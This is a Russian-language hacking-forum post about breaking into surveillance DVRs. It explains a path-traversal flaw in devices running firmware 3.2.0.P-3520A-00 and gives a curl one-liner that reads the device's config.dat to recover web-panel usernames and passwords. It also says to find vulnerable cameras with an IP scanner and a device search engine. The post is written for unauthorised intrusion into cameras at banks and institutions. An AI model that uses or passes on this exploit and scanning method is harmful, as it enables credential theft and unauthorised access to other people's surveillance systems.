Взламываем камеры наблюдения

[Xaker]

Intro

Всем братский приветос, хочу донести до Вас инфу, может и есть в паблике но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даж на Украина на донбасе в последние время начали в мелькать

Инфа

Для начала, посмотрим на саму уязвимость, она была виставлена на

You must be registered for see links

с тайтлом

You must be registered for see links

, - регистратор на 16 камер + 2 вихода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с етой прошивкой. Атакующий может получить доступ до файлов конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.

Адрес где лежит конфигурационный файл.

http://[iP ADDRESS]/../../../mnt/mtd/config/config.dat

Парсинг

Именно для меня на данный момент такой способо парсинга самый актуальный.

Юзаю я Advanced IP Scanner - линк на офф

You must be registered for see links

Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download

Вот такой вид имеет панель входа.

Вот код самого експлойта

curl http://[iP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

Вот пример

Ну и все в итоге у нас юзер и пасс от панели

Maybe End

Все очень и очень просто.

Есть ище поисковик

You must be registered for see links

через который тоже можно искать камеры.

Кому интересно будет развивать данную уязвимось, я всегда открытий для обшения.

Вопросы, замечания в жаббер.

Удачного взлома Вам, маленькие хакеры/